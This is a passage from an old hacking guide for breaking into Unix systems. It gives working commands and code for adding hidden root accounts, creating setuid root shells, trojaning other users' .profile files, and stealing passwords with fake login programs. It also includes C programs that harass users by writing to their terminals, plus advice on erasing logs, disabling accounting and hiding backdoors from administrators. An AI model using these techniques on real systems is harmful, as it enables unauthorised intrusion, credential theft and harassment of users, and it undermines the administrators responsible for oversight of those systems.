of command logins. These are ones which simply execute a command, then
logoff. However, the commands they execute are usually useful. For instance
there are three common command logins that tell you who is online at the
present time. They are:
who
rwho
finger

If you ever successfully get one of these to work, you can write down
the usernames of those online, and try to logon as them. Lots of unsuspecting
users use there login name as their password. For instance, the user
"bob" may have a password named "bob" or "bob1". This, as you know, is
not smart, but they don't expect a hacking spree to be carried out on
them. They merely want to be able to login fast.
If a command login does not exist, or is not useful at all, you will
have to brainstorm. A good thing to try is to use the name of the unix
that it is identified as. For instance, Young INC's Unix may have an account
named "young"
Young, INC. Please Login.
login: young
UNIX SYSTEM V REL 3.2
(c)1984 AT&T..
..
..
..

Some unixes have an account open named "test". This is also a default,
but surprisingly enough, it is sometimes left open. It is good to try to
use it. Remember, brainstorming is the key to a unix that has no apparent
defaults open. Think of things that may go along with the Unix. type
in stuff like "info", "password", "dial", "bbs" and other things that
may pertain to the system. "att" is present on some machines also.

ONCE INSIDE -- SPECIAL FILES
----------------------------
There are several files that are very important to the UNIX
environment. They are as follows:

/etc/passwd - This is probably the most important file on a Unix. Why?
well, basically, it holds the valid usernames/passwords.
This is important since only those listed in the passwd
file can login, and even then some can't (will explain).
The format for the passwordfile is this:

username:password:UserID:GroupID:description(or real name):homedir:shell

Here are two sample entries:

sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh

In the first line, sirhack is a valid user. The second
field, however, is supposed to be a password, right? Well,
it is, but it's encrypted with the DES encryption standard.
the part that says "&a,Ty" may include a date after the comma
(Ty) that tells unix when the password expires. Yes, the
date is encrypted into two alphanumeric characters (Ty).

In the Second example, the demo account has no password.
so at Login, you could type in:

login: demo
UNIX system V
(c)1984 AT&T
..
..

But with sirhack, you'd have to enter a password. Now,
the password file is great, since a lot of times, you;ll
be able to browse through it to look for unpassworded
accounts. Remember that some accounts can be restricted
from logging in, as such:

bin:*:2:2:binaccount:/bin:/bin/sh

The '*' means you won't be able to login with it. Your
only hope would be to run an SUID shell (explained later).

A note about the DES encryption: each unix makes its own unique
"keyword" to base encryption off of. Most of the time its just random letters
and numbers. Its chosen at installation time by the operating system.
Now, decrypting DES encrypted things ain't easy. Its pretty much
impossible. Especially decrypting the password file (decrypting the password
field within the password file to be exact). Always beware a hacker who
says he decrypted a password file. He's full of shit. Passwords are
never decrypted on unix, but rather, a system call is made to a function
called "crypt" from within the C language, and the string you enter as
the password gets encrypted, and compared to the encrypted password. If
they match, you're in. Now, there are password hackers, but they donot
decrypt the password file, but rather, encrypt words from a dictionary
and try them against every account (by crypting/comparing) until it finds
a match (later on!). Remember, few, if none, have decrypted the password
file successfuly.

/etc/group - This file contains The valid groups. The group file is usually
defined as this:
groupname:password:groupid:users in group

Once again, passwords are encrypted here too. If you see a blank
in the password entry you can become part of that group by
using the utility "newgrp". Now, there are some cases in
which even groups with no password will allow only certain
users to be assigned to the group via the newgrp command. Usually,
if the last field is left blank, that means any user can use newgrp
to get that group's access. Otherwise, only the users specified in
the last field can enter the group via newgrp.

Newgrp is just a program that will change your group current
group id you are logged on under to the one you specify. The
syntax for it is: newgrp groupname
Now, if you find a group un passworded, and use newgrp to
enter it, and it asks for a password, you are not allowed to use
the group. I will explain this further in The "SU & Newgrp" section.

/etc/hosts - this file contains a list of hosts it is connected to thru
a hardware network (like an x.25 link or something), or sometimes
just thru UUCP. This is a good file when you are hacking a
large network, since it tells you systems you can use with
rsh (Remote Shell, not restricted shell), rlogin, and telnet,
as well as other ethernet/x.25 link programs.

/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in
Several directories, but it is usually in /usr/adm. This file
is what it sounds like. Its a log file, for the program SU.
What it is for is to keep a record of who uses SU and when.
whenever you use SU, your best bet would be to edit this file
if possible, and I'll tell you how and why in the section
about using "su".

/usr/adm/loginlog
or /usr/adm/acct/loginlog -
This is a log file, keeping track of the logins.
Its purpose is merely for accounting and "security review". Really,
sometimes this file is never found, since a lot of systems keep the
logging off.

/usr/adm/errlog
or errlog - This is the error log. It could be located anywhere. It
keeps track of all serious and even not so serious errors.
Usually, it will contain an error code, then a situation.
the error code can be from 1-10, the higher the number, the
worse the error. Error code 6 is usually used when you try
to hack. "login" logs your attempt in errlog with error code
6. Error code 10 means, in a nutshell, "SYSTEM CRASH".

/usr/adm/culog - This file contains entries that tell when you used cu,
where you called and so forth. Another security thing.

/usr/mail/ - this is where the program "mail" stores its mail.
to read a particular mailbox, so they are called,
you must be that user, in the user group "mail" or
root. each mailbox is just a name. for instance,
if my login was "sirhack" my mail file would usually
be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
Will get into this later.

/etc/shadow - A "shadowed" password file. Will talk about this later.

-- The BIN account --

Well, right now, I'd like to take a moment to talk about the account
"bin". While it is only a user level account, it is very powerful. It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix. See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login. Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$

Then, you could say: exec login, then you could login as sirhack, and
you'd be root.

/\/\/\/\/\/\/\/\/
Hacking..........
/\/\/\/\/\/\/\/\/

--------------
Account Adding
--------------

There are other programs that will add users to the system, instead
of ed. But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100. One of these programs is
named "adduser". Now, the reason I have stuck this little section in, is
for those who want to use a unix for something useful. Say you want a
"mailing address". If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers. You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing yourself.
If the mailer is identified as "smail" when you mail yourself (the program
name will be imbedded in the message) that probably means that the system
will send out UUCP mail. This is a good way to keep in contact with people.
Now, this is why you'd want a semi-permanent account. The way to achieve this
is by adding an account similar to those already on the system. If all the
user-level accounts (UID >= 100) are three letter abbriviations, say
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account
via adduser, and make a name like sally jane marshall or something
(they don't expect hackers to put in female names) and have the account
named sjm. See, in the account description (like Mr. Hackalot above), that
is where the real name is usually stored. So, sjm might look like this:
sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
Of course, you will password protect this account, right?
Also, group id's don't have to be above 100, but you must put the account
into one that exists. Now, once you login with this account, the first
thing you'd want to do is execute "passwd" to set a password up. If you
don't, chances are someone else 'll do it for you (Then you'll be SOL).

-------------------
Set The User ID
-------------------

This is porbably one of the most used schemes. Setting up an "UID-
Shell". What does this mean? Well, it basically means you are going
to set the user-bit on a program. The program most commonly used is
a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access
to whatever the owner of the file does. A UID shell sets the user-ID of
the person who executes it to the owner of the program. So if root
owns a uid shell, then you become root when you run it. This is an
alternate way to become root.

Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in. Of course, you almost HAVE to
get rid of that account or else it WILL be noticed eventually. So, what
you would do is set up a regular user account for yourself, then, make
a uid shell. Usually you would use /bin/sh to do it. After adding
the regular user to the passwd file, and setting up his home directory,
you could do something like this:
(assume you set up the account: shk)
# cp /bin/sh /usr/shk/runme
# chmod a+s /usr/shk/runme

Thats all there would be to it. When you logged in as shk, you could just
type in:

$ runme
#

See? You'd then be root. Here is a thing to do:

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID. UID-shells only set the effective
userid, not the real user-id. But, the effective user id over-rides the
real user id. Now, you can, if you wanted to just be annoying, make
the utilities suid to root. What do I mean? For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap

Ls would then be able to pry into ANY directory. If you did the same to
"cat" you could view any file. If you did it to rm, you could delete any
file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).

How do I get root?
------------------

Good question indeed. To make a program set the user-id shell to root,
you have to be root, unless you're lucky. What do I mean? Well, say
you find a program that sets the user-id to root. If you have access
to write to that file, guess what? you can copy over it, but keep
the uid bit set. So, say you see that the program chsh is setting
the user id too root. You can copy /bin/sh over it.

$ ls -l
rwsrwsrws root other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh
#

See? That is just one way. There are others, which I will now talk
about.

More on setting the UID
-----------------------

Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file. Now, only those who own the file
can set the user ID bit. Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file. This brings
me to BAD file permissions.

II. HACKING : Bad Directory Permissions

Now, what do I mean for bad directory permissions? Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it. Now, this comes
in handy when wanting to steal someone's access. If you can write to
a user's .profile, you are in business. You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

Now, when the user next logs on, the .profile will create .runme which
will set your ID to the user whose .profile you changed. Ideally, you'll
go back in and zap those lines after the suid is created, and you'll create
a suid somewhere else, and delete the one in his dir. The .runme will
not appear in the user's REGULAR directory list, it will only show up
if he does "ls -a" (or ls with a -a combination), because, the '.' makes
a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix. The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *

The BEST thing that could happen is to find a user's directory writeable
by you. Why? well, you could replace all the files in the directory
with your own devious scripts, or C trojans. Even if a file is not
writeable by you, you can still overwrite it by deleteing it. If you
can read various files, such as the user's .profile, you can make a
self deleting trojan as so:

$ cp .profile temp.pro
$ ed .profile
1234
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
mv temp.pro .profile
(control-d)
? w
[another number]
? q
$ chown that_user temp.pro

What happens is that you make a copy of the .profile before you change it.
Then, you change the original. When he runs it, the steps are made, then
the original version is placed over the current, so if the idiot looks in
his .profile, he won't see anything out of the ordinary, except that he
could notice in a long listing that the change date is very recent, but
most users are not paranoid enough to do extensive checks on their files,
except sysadm files (such as passwd).

Now, remember, even though you can write to a dir, you may not be able
to write to a file without deleting it. If you do not have write perms
for that file, you'll have to delete it and write something in its place
(put a file with the same name there). The most important thing to remember
if you have to delete a .profile is to CHANGE the OWNER back after you
construct a new one (hehe) for that user. He could easily notice that his
.profile was changed and he'll know who did it. YES, you can change the
owner to someone else besides yourself and the original owner (as to throw
him off), but this is not wise as keeping access usually relies on the fact
that they don't know you are around.

You can easily change cron files if you can write to them. I'm not going
to go into detail about cronfile formats here, just find the crontab files
and modify them to create a shell somewhere as root every once in a while,
and set the user-id.

III. Trojan Horses on Detached terminals.
Basically this: You can send garbage to a user's screen and
mess him up bad enough to force a logoff, creating a detached
account. Then you can execute a trojan horse off that terminal in
place of login or something, so the next one who calls can hit the
trojan horse. This USUALLY takes the form of a fake login and
write the username/pw entererred to disk.

Now, there are other trojan horses available for you to write. Now,
don't go thinking about a virus, for they don't work unless ROOT runs
them. Anyway, a common trjan would be a shell script to get the
password, and mail it to you. Now, you can replace the code for
the self deleting trojan with one saying something like:
echo "login: \c"
read lgin
echo off (works on some systems)
(if above not available...: stty -noecho)
echo "Password:\c"
read pw
echo on
echo "Login: $lgin - Pword: $pw" | mail you

Now, the best way to use this is to put it in a seperate script file
so it can be deleted as part of the self deleting trojan. A quick
modification, removing the "login: " and leaving the password
may have it look like SU, so you can get the root password. But
make sure the program deletes itself. Here is a sample trojan
login in C:

#include
/* Get the necessary defs.. */
main()
{
char *name[80];
char *pw[20];
FILE *strm;
printf("login: ");
gets(name);
pw = getpass("Password:");
strm = fopen("/WhereEver/Whateverfile","a");
fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
fclose(strm);
/* put some kind of error below... or something... */
printf("Bus Error - Core Dumped\n");
exit(1);
}

The program gets the login, and the password, and appends it to
a file (/wherever/whateverfile), and creates the file if it can,
and if its not there. That is just an example. Network Annoyances
come later.

IV. Odd systems

There may be systems you can log in to with no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..). Don't give up here. Some systems will
let you login as root, but give you a menu which will allow you to add an
account. However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell. You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting. HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100. The "editing" usually only involves changing the password
on the account. If an account has a * for a password, the standard passwd
program which changes programs, will say no pw exists, and will ask you to
enter one. (wallah! You have just freed an account for yourself. Usually
bin and sys have a * for a password). If one exists you'll have to enter
the old Password (I hope you know it!) for that account. Then, you are
in the same boat as before. (BTW -- These wierd systems are usually
Xenix/386, Xenix/286, or Altos/286)
With word processors, usually you can select the load command,
and when the word processor prompts for a file, you can select the passwd
file, to look for open accounts, or at least valid ones to hack. An example
would be the informix system. You can get a word processor with that such
as Samna word, or something, and those Lamers will not protect against
shit like that. Why? The Passwd file HAS to be readable by all for the most
part, so each program can "stat" you. However, word processors could be made
to restrict editing to a directory, or set of directories. Here is an
example:

$ id
uid=100(sirhack) gid=100(users)
$ sword
(word processor comes up)
(select LOAD A FILE)
: /etc/passwd

(you see: )
root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
...

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

You can usually tell when you'll get a menu. Sometimes on UNIX
SYSTEM V, when it says TERM = (termtype), and is waiting for
you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
Not much to say about this. all it is, is when every password field
in the password file has an "x" or just a single character. What
that does is screw you, becuase you cannot read the shadowed password
file, only root can, and it contains all the passwords, so you will
not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
the interrupt handler doesn't catch, and things like that. However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything. Now I will Talk about Internet.

--->>> InterNet <<<---
Why do I want to talk about InterNet? Well, because it is a prime
example of a TCP/IP network, better known as a WAN (Wide-Area-Network).
Now, mainly you will find BSD systems off of the Internet, or SunOS, for
they are the most common. They may not be when System V, Rel 4.0, Version
2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump
from one computer to another once you are logged in. What happens is
EACH system has a "yello page password file". Better known as yppasswd.
If you look in there, and see blank passwords you can use rsh, rlogin, etc..
to slip into that system. One system in particular I came across had a
a yppasswd file where *300* users had blank passwords in the Yellow Pages.
Once I got in on the "test" account, ALL I had to do was select who I wanted
to be, and do: rlogin -l user (sometimes -n). Then it would log me onto
the system I was already on, through TCP/IP. However, when you do this,
remember that the yppasswd only pertains to the system you are on at
the time. To find accounts, you could find the yppasswd file and do:

% cat yppasswd | grep ::

Or, if you can't find yppasswd..

% ypcat passwd | grep ::

On ONE system (which will remain confidential), I found the DAEMON account
left open in the yppasswd file. Not bad. Anyway, through one system
on the internet, you can reach many. Just use rsh, or rlogin, and look
in the file: /etc/hosts for valid sites which you can reach. If you get
on to a system, and rlogin to somewhere else, and it asks for a password,
that just means one of two things:

A. Your account that you have hacked on the one computer is on the target
computer as well. Try to use the same password (if any) you found the
hacked account to have. If it is a default, then it is definitly on the
other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it
was like typing in your login at a "login: " prompt. You may not exist on
the other machine. Try "rlogin -l login_name", or rlogin -n name..
sometimes, you can execute "rwho" on another machine, and get a valid
account.

Some notes on Internet servers. There are "GATEWAYS" that you can get into
that will allow access to MANY internet sites. They are mostly run off
a modified GL/1 or GS/1. No big deal. They have help files. However,
you can get a "privilged" access on them, which will give you CONTROL of
the gateway.. You can shut it down, remove systems from the Internet, etc..
When you request to become privileged, it will ask for a password. There is
a default. The default is "system". I have come across *5* gateways with
the default password. Then again, DECNET has the same password, and I have
come across 100+ of those with the default privileged password. CERT Sucks.
a Gateway that led to APPLE.COM had the default password. Anyone could
have removed apple.com from the internet. Be advised that there are many
networks now that use TCP/IP.. Such as BARRNET, LANET, and many other
University networks.

--** Having Fun **--

Now, if nothing else, you should atleast have some fun. No, I do not mean
go trashing hardrives, or unlinking directories to take up inodes, I mean
play with online users. There are many things to do. Re-direct output
to them is the biggie. Here is an example:
$ who
loozer tty1
sirhack tty2
$ banner You Suck >/dev/tty1
$
That sent the output to loozer. The TTY1 is where I/O is being performed
to his terminal (usually a modem if it is a TTY). You can repetitiously
banner him with a do while statement in shell, causing him to logoff. Or
you can get sly, and just screw with him. Observe this C program:

#include
#include
#include

main(argc,argument)
int argc;
char *argument[];
{
int handle;
char *pstr,*olm[80];
char *devstr = "/dev/";
int acnt = 2;
FILE *strm;
pstr = "";
if (argc == 1) {
printf("OL (OneLiner) Version 1.00 \n");
printf("By Sir Hackalot [PHAZE]\n");
printf("\nSyntax: ol tty message\n");
printf("Example: ol tty01 You suck\n");
exit(1);
}
printf("OL (OneLiner) Version 1.0\n");
printf("By Sir Hackalot [PHAZE]\n");
if (argc == 2) {
strcpy(olm,"");
printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
printf("Enter one Here => ");
gets(olm);
}
strcpy(pstr,"");
strcat(pstr,devstr);
strcat(pstr,argument[1]);
printf("Sending to: [%s]\n",pstr);
strm = fopen(pstr,"a");
if (strm == NULL) {
printf("Error writing to: %s\n",pstr);
printf("Cause: No Write Perms?\n");
exit(2);
}
if (argc == 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());
fprintf(strm,"%s\n",olm);
fclose(strm);
printf("Message Sent.\n");
exit(0);
}
if (argc > 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());
while (acnt <= argc - 1) {
fprintf(strm,"%s ",argument[acnt]);
acnt++;
}
fclose(strm);
printf("Message sent!\n");
exit(0);
}
}

What the above does is send one line of text to a device writeable by you
in /dev. If you try it on a user named "sirhack" it will notify sirhack
of what you are doing. You can supply an argument at the command line, or
leave a blank message, then it will prompt for one. You MUST supply a
Terminal. Also, if you want to use ?, or *, or (), or [], you must not
supply a message at the command line, wait till it prompts you. Example:

$ ol tty1 You Suck!
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Sending to: [/dev/tty1]
Message Sent!
$
Or..
$ ol tty1
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Dummy! You Forgot to Supply a ONE LINE MESSAGE!
Enter one here => Loozer! Logoff (NOW)!! ^G^G
Sending to: [/dev/tty1]
Message Sent!
$

You can even use it to fake messages from root. Here is another:

/*
* Hose another user
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define NMAX sizeof(ubuf.ut_name)

struct utmp ubuf;
struct termio oldmode, mode;
struct utsname name;
int yn;
int loop = 0;
char *realme[50] = "Unknown";
char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];
char *histtya, *ttyname(), *strrchr(), *getenv();
int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
FILE *tf;

main(argc, argv)
int argc;
char *argv[];
{
register FILE *uf;
char c1, lastc;
int goodtty = 0;
long clock = time((long *) 0);
struct tm *localtime();
struct tm *localclock = localtime( &clock );
struct stat stbuf;
char psbuf[20], buf[80], window[20], junk[20];
FILE *pfp, *popen();

if (argc < 2) {
printf("usage: hose user [ttyname]\n");
exit(1);
}
him = argv[1];

if (argc > 2)
histtya = argv[2];
if ((uf = fopen("/etc/utmp", "r")) == NULL) {
printf("cannot open /etc/utmp\n");
exit(1);
}
cuserid(me);
if (me == NULL) {
printf("Can't find your login name\n");
exit(1);
}
mytty = ttyname(2);
if (mytty == NULL) {
printf("Can't find your tty\n");
exit(1);
}
if (stat(mytty, &stbuf) < 0) {
printf("Can't stat your tty -- This System is bogus.\n");
}
if ((stbuf.st_mode&02) == 0) {
printf("You have write permissions turned off (hehe!).\n");
}

if (histtya) {
if (!strncmp(histtya, "/dev/", 5))
histtya = strrchr(histtya, '/') + 1;
strcpy(histty, "/dev/");
strcat(histty, histtya);
}
while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) {
if (ubuf.ut_name[0] == '\0')
continue;
if (!strncmp(ubuf.ut_name, him, NMAX)) {
logcnt++;
if (histty[0]==0) {
strcpy(histty, "/dev/");
strcat(histty, ubuf.ut_line);
}
if (histtya) {
if (!strcmp(ubuf.ut_line, histtya))
goodtty++;
}
}
}
fclose(uf);
if (logcnt==0) {
printf("%s not found! (Not logged in?)\n", him);
exit(1);
}

if (histtya==0 && logcnt > 1) {
printf("%s logged more than once\nwriting to %s\n", him, histty+5);
}
if (access(histty, 0) < 0) {
printf("No such tty? [%s]\n",histty);
exit(1);
}
signal(SIGALRM, timout);
alarm(5);
if ((tf = fopen(histty, "w")) == NULL)
goto perm;
alarm(0);
if (fstat(fileno(tf), &stbuf) < 0)
goto perm;
if (geteuid() != 0 && (stbuf.st_mode&02) == 0)
goto perm;
ioctl(0, TCGETA, &oldmode); /* save tty state */
ioctl(0, TCGETA, &mode);
sigs(eof);
uname(&name);
if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1;
if (yn == 1 ) {
fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me);
fclose(tf);
printf("Critical Error Handler: %s running conflicting process\n",him);
exit(1);
}
fflush(tf);
mode.c_cc[4] = 1;
mode.c_cc[5] = 0;
mode.c_lflag &= ~ICANON;
ioctl(0, TCSETAW, &mode);
lastc = '\n';

printf("Backspace / Spin Cursor set lose on: %s\n",him);
while (loop == 0) {
c1 = '\b';
write(fileno(tf),&c1,1);
sleep(5);
fprintf(tf,"\\\b|\b/\b-\b+\b");
fflush(tf);
}

perm:
printf("Write Permissions denied!\n");
exit(1);
}

timout()
{

printf("Timeout opening their tty\n");
exit(1);
}

eof()
{
printf("Bye..\n");
ioctl(0, TCSETAW, &oldmode);
exit(0);
}

ex()
{
register i;
sigs(SIG_IGN);
i = fork();
if (i < 0) {
printf("Try again\n");
goto out;
}
if (i == 0) {
sigs((int (*)())0);
execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0);
exit(0);
}
while(wait((int *)NULL) != i)
;
printf("!\n");
out:
sigs(eof);
}

sigs(sig)
int (*sig)();
{
register i;
for (i=0; signum[i]; i++)
signal(signum[i], sig);
}

What the above is, is a modified version of the standard write command.
What it does, is spin the cursor once, then backspace once over the
screen of the user it is run on. All though, it does not physically affect
input, the user thinks it does. therefore, he garbles input. The sleep(xx)
can be changed to make the stuff happen more often, or less often.
If you put your login name in the "YOURNAMEHERE" slot, it will protect you
from getting hit by it, if someone off a Public access unix leeches the
executable from your directory.
You could make a shorter program that does almost the same thing, but
you have to supply the terminal, observe:

/* Backspace virus, by Sir Hackalot [Phaze] */
#include
#include
main(argc,argv)
char *argv[];
int argc;
{
int x = 1;
char *device = "/dev/";
FILE *histty;
if (argc == 1) {
printf("Bafoon. Supply a TTY.\n");
exit(1);
}
strcat(device,argv[1]);
/* Make the filename /dev/tty.. */
histty = fopen(device,"a");
if (histty == NULL) {
printf("Error opening/writing to tty. Check their perms.\n");
exit(1);
}
printf("BSV - Backspace virus, By Sir Hackalot.\n");
printf("The Sucker on %s is getting it!\n",device);
while (x == 1) {
fprintf(histty,"\b\b");
fflush(histty);
sleep(5);
}
}

Thats all there is to it. If you can write to their tty, you can use this on
them. It sends two backspaces to them every approx. 5 seconds. You
should run this program in the background. (&). Here is an example:

$ who
sirhack tty11
loozer tty12
$ bsv tty12&
[1] 4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!
$

Now, it will keep "attacking" him, until he loggs of, or you kill the process
(which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line. However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right. Else, you'll see a ^M at the end of every
line. I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to
get your imagination going, provided you are a C programmer. You can annoy
users other ways. One thing you can do is screw up the user's mailbox.
The way to do this is to find a binary file (30k or bigger) on the system
which YOU have access to read. then, do this:

$ cat binary_file | mail loozer

or

$ mail loozer < binary file

That usually will spilt into 2 messages or more. The 1st message will
have a from line.. (from you ..), but the second WILL NOT! Since it does
not, the mail reader will keep exiting and giving him an error message until
it gets fixed.. The way to fix it is to go to the mail box that got hit
with this trick (usually only the one who got hit (or root) and do this),
and edit the file, and add a from line.. like
From username..

then it will be ok. You can screw the user by "cat"ing a binary to his tty.
say Loozer is on tty12. You can say..
$ cat binary_file >/dev/tty12
$
It may pause for a while while it outputs it. If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
$
And he will probably logoff. You can send the output of anything to his
terminal. Even what YOU do in shell. Like this:
$ sh >/dev/tty12
$
You'll get your prompts, but you won't see the output of any commands, he
will...
$ ls
$ banner Idiot!
$ echo Dumbass!
$
until you type in exit, or hit ctrl-d.

There are many many things you can do. You can fake a "write" to someone
and make them think it was from somewhere on the other side of hell. Be
creative.

When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell. If you get
someone to run a trojan that does that, you can run the suid, and log their
ass off by killing their mother PID. (kill -9 whatever). Or, you can
lock them out by adding "kill -1 0" to their .profile. On the subject of
holes, always look for BAD suid bits. On one system thought to be invincible
I was able to read/modify everyone's mail, because I used a mailer that had
both the GroupID set, and the UserID set. When I went to shell from it,
the program instantly changed my Effective ID back to me, so I would not be
able to do anything but my regular stuff. But it was not designed to change
the GROUP ID back. The sysop had blundered there. SO when I did an ID
I found my group to be "Mail". Mailfiles are readble/writeable by the
user "mail", and the group "mail". I then set up a sgid (set group id) shell
to change my group id to "mail" when I ran it, and scanned important mail,
and it got me some good info. So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it. Some tips on doing so
is:
1. Don't give it out. If the sysadm sees that joeuser logged in 500
times in one night....then....
2. Don't stay on for hours at a time. They can trace you then. Also
they will know it is irregular to have joeuser on for 4 hours
after work.
3. Don't trash the system. Don't erase important files, and don't
hog inodes, or anything like that. Use the machine for a specific
purpose (to leech source code, develop programs, an Email site).
Dont be an asshole, and don't try to erase everything you can.
4. Don't screw with users constantly. Watch their processes and
run what they run. It may get you good info (snoop!)
5. If you add an account, first look at the accounts already in there
If you see a bunch of accounts that are just 3 letter abbrv.'s,
then make yours so. If a bunch are "cln, dok, wed" or something,
don't add one that is "joeuser", add one that is someone's
full initials.

6. When you add an account, put a woman's name in for the
description, if it fits (Meaning, if only companies log on to the
unix, put a company name there). People do not suspect hackers
to use women's names. They look for men's names.
7. Don't cost the Unix machine too much money. Ie.. don't abuse an
outdial, or if it controls trunks, do not set up a bunch of dial
outs. If there is a pad, don't use it unless you NEED it.
8. Don't use x.25 pads. Their usage is heavily logged.
9. Turn off acct logging (acct off) if you have the access to.
Turn it on when you are done.
10. Remove any trojan horses you set up to give you access when you
get access.
11. Do NOT change the MOTD file to say "I hacked this system" Just
thought I'd tell you. Many MANY people do that, and lose access
within 2 hours, if the unix is worth a spit.
12. Use good judgement. Cover your tracks. If you use su, clean
up the sulog.
13. If you use cu, clean up the cu_log.
14. If you use the smtp bug (wizard/debug), set up a uid shell.
15. Hide all suid shells. Here's how:
goto /usr
(or any dir)
do:
# mkdir ".. "
# cd ".. "
# cp /bin/sh ".whatever"
# chmod a+s ".whatever"
The "" are NEEDED to get to the directory .. ! It will not show
up in a listing, and it is hard as hell to get to by sysadms if
you make 4 or 5 spaces in there (".. "), because all they will
see in a directory FULL list will be .. and they won't be able to
get there unless they use "" and know the spacing. "" is used
when you want to do literals, or use a wildcard as part of a file
name.
16. Don't hog cpu time with password hackers. They really don't work
well.

17. Don't use too much disk space. If you archieve something to dl,
dl it, then kill the archieve.
18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get
into systems...". Wrong. (Yo Pheds! You reading this??). It IS true
when you are dealing with WAN's, such as telenet, tyment, and the Internet,
but not with local computers not on those networks. Here's the story:

Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck. Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix. Now, since they get paid by
the hour usaually when setting one up, they spread it out over days....
during these days, the system is WIDE open (if it has a dialin). Get
in and add yourself to passwd before the seal it off (if they do..).
Then again, after the machine is set up, they leave the defaults on the
system. Why? The company needs to get in, and most VARs cannot use
unix worth a shit, all they know how to do is set it up, and that is ALL.
Then, they turn over the system to a company or business that USUALLY
has no-one that knows what they hell they are doing with the thing, except
with menus. So, they leave the system open to all...(inadvertedly..),
because they are not competant. So, you could usually get on, and create
havoc, and at first they will think it is a bug.. I have seen this
